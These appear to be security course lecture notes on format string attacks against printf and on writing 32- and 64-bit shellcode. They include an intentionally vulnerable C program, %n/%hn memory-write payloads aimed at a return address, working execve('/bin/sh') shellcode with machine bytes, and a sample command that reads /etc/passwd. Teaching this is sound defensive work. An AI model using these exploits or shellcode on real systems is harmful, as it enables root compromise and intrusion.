Outline
- Format String
- Access optional arguments
- How
printf() works - Format string attack
- How to exploit the vulnerability
- Countermeasures
printf(): Prints a string according to a format.
intprintf(constchar∗format,…);- Argument list of
printf() consists of:- One concrete argument
format - Zero or more optional arguments
- Compilers don’t complain if fewer arguments are passed to
printf() during invocation.
Access Optional Arguments
myprint() shows how printf() actually works.- Consider
myprintf() invoked in line 7. va_list pointer (line 1) accesses the optional arguments.va_start() macro (line 2) calculates the initial position of va_list based on the second argument Narg (last argument before the optional arguments begin).va_start() macro gets the start address of Narg, finds the size based on the data type, and sets the value for the va_list pointer.va_list pointer advances using va_arg() macro.va_arg(ap, int): Moves the ap pointer (va_list) up by 4 bytes.- When all the optional arguments are accessed,
va_end() is called.
How printf() Accesses Optional Arguments
printf() has three optional arguments.- Elements starting with “%” are called format specifiers.
printf() scans the format string and prints out each character until “%” is encountered.printf() calls va_arg(), which returns the optional argument pointed by va_list and advances it to the next argument.- When
printf() is invoked, the arguments are pushed onto the stack in reverse order. - When it scans and prints the format string,
printf() replaces %d with the value from the first optional argument and prints out the value. va_list is then moved to the position 2.va_arg() macro doesn’t understand if it reached the end of the optional argument list.- It continues fetching data from the stack and advancing the
va_list pointer.
- If
user_input contains format specifiers, it becomes part of a format string.
Vulnerable Code Example
#include <stdio.h>
void fmtstr()
{
char input [100];
int var=0x11223344;
/* print out information for experiment purpose */
printf("Target address: %x\n", (unsigned) &var);
printf("Data at target address: 0x%x\n", var);
printf("Please enter a string: ");
fgets (input, sizeof (input)-1, stdin);
printf(input); // The vulnerable place
printf("Data at target address: 0x%x\n", var);
}
void main() { fmtstr(); }
- Inside
printf(), the starting point of the optional arguments (va_list pointer) is the position right above the format string argument.
What Can We Achieve?
- Attack 1: Crash program
- Attack 2: Print out data on the stack
- Attack 3: Change the program’s data in the memory
- Attack 4: Change the program’s data to a specific value
- Attack 5: Inject Malicious Code
Attack 1: Crash Program
- Use input:
%s%s%s%s%s%s%s%s printf() parses the format string.- For each
%s, it fetches a value where va_list points to and advances va_list to the next position. - Since
%s interprets the value as an address and fetches data from that address, providing an invalid address will cause the program to crash.
Attack 2: Print Out Data on the Stack
- To print out a secret variable on the stack:
- Use user input:
%x%x%x%x%x%x%x%x printf() prints out the integer value pointed to by va_list pointer and advances it by 4 bytes.- The number of
%x specifiers is determined by the distance between the starting point of the va_list pointer and the variable, achievable through trial and error.
Attack 3: Change Program’s Data in the Memory
- Goal: change the value of
var variable from 0x11223344 to some other value. %n: Writes the number of characters printed out so far into memory.printf(“hello%n”,&i) ⇒ When printf() gets to %n, it has already printed 5 characters, so it stores 5 to the provided memory address.%n treats the value pointed to by the va_list pointer as a memory address and writes into that location.- If we want to write a value to a memory location, we need to have its address on the stack.
- The address of
var is provided at the beginning of the input so that it is stored on the stack. $(command): Command substitution. Allows the output of the command to replace the command itself.\x04: Indicates that “04” is an actual number and not as two ASCII characters. Assuming the address of var is 0xbffff304 (can be obtained using gdb)var's address (0xbffff304) is on the stack.- Goal: To move the
va_list pointer to this location and then use %n to store some value. %x is used to advance the va_list pointer.- Using trial and error, check how many
%x are needed to print out 0xbffff304. - If 6
%x format specifiers are needed, use 5 %x and 1 %n. - After the attack, data in the target address is modified to
0x2c (44 in decimal), because 44 characters have been printed out before %n.
Attack 4: Change Program’s Data to a Specific Value
- Goal: To change the value of
var from 0x11223344 to 0x9896a9 printf() has already printed out 41 characters before %.10000000x, so, 10000000+41 = 10000041 (0x9896a9) will be stored in 0xbffff304.
Attack 4: A Faster Approach
- Goal: change the value of
var to 0x66887799 - Use
%hn to modify the var variable two bytes at a time. - Break the memory of
var into two parts, each with two bytes. - Most computers use the Little-Endian architecture
- The 2 least significant bytes (
0x7799) are stored at address 0xbffff304 - The 2 most significant bytes (
0x6688) are stored at 0xbffff306
- If the first
%hn gets value x, and before the next %hn, t more characters are printed, the second %hn will get value x+t. - Overwrite the bytes at
0xbffff306 with 0x6688. - Print some more characters so that when we reach
0xbffff304, the number of characters will be increased to 0x7799. - The attack format consists of:
- Address A: first part of address of
var (4 chars) - Address B: second part of address of
var (4 chars) 4 %.8x: To move va_list to reach Address 1 (Trial and error, 4x8=32)@@@@: 4 chars5 _: 5 chars- Total: 12+5+32 = 49 chars
- To print
0x6688 (26248), we need 26248 - 49 = 26199 characters as a precision field of %x. - If we use
%hn after the first address, va_list will point to the second address and the same value will be stored. - Hence, put
@@@@ between the two addresses so that we can insert one more %x and increase the number of printed characters to 0x7799. - After the first
%hn, the va_list pointer points to @@@@, the pointer will advance to the second address. The precision field is set to 4368 =30617 - 26248 -1 in order to print 0x7799 (30617) when we reach second %hn.
Attack 5: Inject Malicious Code
- Goal: Modify the return address of the vulnerable code and let it point to the malicious code (e.g., shellcode to execute
/bin/sh). Get root access if the vulnerable code is a SET-UID program. - Challenges:
- Inject Malicious code in the stack
- Find starting address (A) of the injected code
- Find return address (B) of the vulnerable code
- Write value A to B
- Using gdb to get the return address and start address of the malicious code.
- Assume that the return address is
0xbffff38c - Assume that the start address of the malicious code is
0xbfff358 - Goal: Write the value
0xbfff358 to address 0xbffff38c- Break
0xbffff38c into two contiguous 2-byte memory locations: 0xbffff38c and 0xbffff38e - Store
0xbfff into 0xbffff38e and 0xf358 into 0xbffff38c
- Number of characters printed before the first
%hn = 12 + (4x8) + 5 + 49102 = 49151 (0xbfff). - After the first
%hn, 13144 + 1 =13145 are printed - 49151 + 13145 = 62296 (
0xbffff358) is printed on 0xbffff38c
Countermeasures: Developer
- Avoid using untrusted user inputs for format strings in functions like
printf, sprintf, fprintf, vprintf, scanf, vfscanf.
Countermeasures: Compiler
- Compilers can detect potential format string vulnerabilities.
- Use two compilers to compile the program:
gcc and clang. - There should be a mismatch in the format string.
- With default settings, both compilers give warnings for the first
printf(). - No warning was given out for the second one.
- On giving an option
-wformat=2, both compilers give warnings for both printf statements stating that the format string is not a string literal. - These warnings just act as reminders to the developers that there is a potential problem but nevertheless compile the programs.
Other Countermeasures
- Address randomization: Makes it difficult for the attackers to guess the address of the target memory (return address, address of the malicious code)
- Non-executable Stack/Heap: Attackers can use the return-to-libc technique to defeat the countermeasure.
- How format string works
- Format string vulnerability
- Exploiting the vulnerability
- Injecting malicious code by exploiting the vulnerability
Shellcode
Outline
- Challenges in writing shellcode
- Two approaches
- 32-bit and 64-bit Shellcode
Introduction
- In code injection attack: need to inject binary code
- Shellcode is a common choice
- Its goal: get a shell. After that, arbitrary commands can be run
- Written using assembly code
Writing a Simple Assembly Program
- Invoke
exit() - Compilation (32-bit)
$ nasm -f elf32 -o myexit.o myexit.s - Linking to generate final binary
$ ld -m elf_i386 myexit.o -o myexit
section .text
global _start
_start:
mov eax, 1
mov ebx, 0
int 0x80
- Consider the following program
int main(int argc, char **argv) {
char buf[64];
gets(buf);
}
THE BASIC IDEA
Writing Shellcode Using C.
#include <unistd.h>
void main()
{
char *argv[2];
argv[0] = "/bin/sh";
argv[1] = NULL;
execve (argv[0], argv, NULL);
}
Getting the Binary Code
$ gcc -m32 shellcode.c
$ objdump -Mintel --disassemble a.out
Writing Shellcode Using Assembly
- Invoking
execve(“/bin/sh”, argv, 0)eax = 0x0b: execve() system call numberebx = address of the command string “/bin/sh”ecx = address of the argument array argvedx = address of environment variables (set to 0)
Setting ebx
xor eax, eax
push eax
push "//sh"
push "/bin"
mov ebx, esp
Setting ecx
argv[0] = address of "/bin//sh"
argv[1] = 0
push eax
push ebx
mov ecx, esp
Setting edx
xor edx, edx
Invoking execve()
xor eax, eax
mov al, 0x0b
int 0x80
Putting Everything Together
xor eax, eax
push eax ; Use 0 to terminate the string
push "//sh"
push "/bin"
mov ebx, esp ; Get the string address
push eax ; argv[1] = 0
push ebx ; argv[0] points "/bin//sh"
mov ecx, esp ; Get the address of argv[]
xor edx, edx ; For environment variable, no env variables
xor eax, eax
mov al, 0x0b
int 0x80 ; Invoke execve ()
Compilation and Testing
$ nasm -f elf32 -o shellcode_one.o shellcode_one.s
$ ld -m elf_i386 -o shellcode_one shellcode_one.o
$ echo
9650 <-- the current shell's process ID
$ ./shellcode_one
$ echo
12380 <-- the current shell's process ID (a new shell)
GETTING RID OF ZEROS FROM SHELLCODE
How to Avoid Zeros
- Using xor
- “
mov eax, 0”: not good, it has a zero in the machine code - “
xor eax, eax”: no zero in the machine code
- Using instruction with one-byte operand
- How to save
0x00000099 to eax? - “
mov eax, 0x99”: not good, 0x99 is actually 0x00000099 - “
xor eax, eax; mov al, 0x99”: al represent the last byte of eax
Using Shift Operator
- How to assign
0x0011223344 to ebx?
mov ebx, 0xFF112233
shl ebx, 8
shr ebx, 8
Pushing the "/bin/bash" String Into Stack
- Without using the
// technique
mov edx, "htt"
shl edx, 24 ; shift left for 24 bits
shr edx, 24 ; shift right for 24 bits
push edx ; edx now contains h\0\0\0
push "/bas"
push "/bin"
mov ebx, esp ; Get the string address
ANOTHER APPROACH
Getting the Addresses of String and ARGV[]
- This address is pushed into the stack by “call”
- Pop out the address stored by “call”
two:
call one
db '/bin/sh*'
db 'AAAA'
db 'BBBB'
Data Preparation
; Putting a zero at the end of the shell string
xor eax, eax ; eax contains a zero
mov [ebx+7], al
; Constructing the argument array
mov [ebx+8], ebx
mov [ebx+12], eax
lea ecx, [ebx+8] ; let ecx = ebx +8
Compilation and Testing
- Error (code region cannot be modified)
$ nasm -f elf32 -o shellcode_two.o shellcode_two.s
$ ld -m elf_i386 -o shellcode_two shellcode_two.o
$ ./shellcode_two
Segmentation fault
- Make code region writable
$ nasm -f elf32 -o shellcode_two.o shellcode_two.s
$ ld --omagic -m elf_i386 -o shellcode_two shellcode_two.o
$ ./shellcode_two
$
64-BIT SHELLCODE
_start:
xor rdx, rdx ; 3rd argument
push rdx
mov rax, "/bin//sh" ; 1st argument = argv[1] = 0
push rax ; argv[0] points "/bin//sh"
mov rdi, rsp ; 2nd argument
push rdx
push rdi
mov rsi, rsp
xor rax, rax
mov al, 0x3b ; execve ( )
syscall
A Generic Shellcode (64-bit)
- Goal: execute arbitrary commands
/bin/bash -c "<commands>"
Data region
two:
call one
db '/bin/bash*'
db '-c*'
; List of commands
db '/bin/ls -1; echo Hello 64; /bin/tail -n 4 /etc/passwd'
db 'AAAAAAAA' ; Place holder for argv[0] --> "/bin/bash"
db 'BBBBBBBB' ; Place holder for argv[1] --> "-c"
db 'CCCCCCCC' ; Place holder for argv[2] --> the cmd string
db 'DDDDDDDD' ; Place holder for argv[3] --> NULL
Data Preparation (1)
one:
pop rbx ; Get the address of the data
; Add zero to each of string
xor rax, rax
mov [rbx+9], al ; terminate the "/bin/bash" string
mov [rbx+12], al ; terminate the "-c" string
mov [rbx+ARGV-1], al ; terminate the cmd string
Data Preparation (2)
; Construct the argument arrays
mov [rbx+ARGV], rbx ; argv[0] --> "/bin/bash"
lea rcx, [rbx+10]
mov [rbx+ARGV+8], rcx ; argv[1] --> "-c"
lea rcx, [rbx+13]
mov [rbx+ARGV+16], rcx ; argv[2] --> the cmd string
mov [rbx+ARGV+24], rax ; argv[3] = 0
; rdi --> "/bin/bash"
mov rdi, rbx
; rsi --> argv[]
lea rsi, [rbx+ARGV]
; rdx = 0
xor rdx, rdx
; execve ()
xor rax, rax
mov al, 0x3b
syscall
Machine Code
shellcode = (
"\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48"
"\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48"
"\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31"
"\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff"
"/bin/bash*"
"-C*"
"/bin/ls -1; echo Hello 64; /bin/tail -n 4 /etc/passwd"
# The * in this comment serves as the position marker
"AAAAAAAA" # Placeholder for argv[0] --> "/bin/bash"
"BBBBBBBB" # Placeholder for argv[1] --> "-c"
"CCCCCCCC" # Placeholder for argv[2] --> the cmd string
"DDDDDDDD" # Placeholder for argv[3] --> NULL
).encode('latin-1')
Summary of Shellcode
- Challenges in writing shellcode
- Two approaches
- 32-bit and 64-bit Shellcode
- A generic shellcode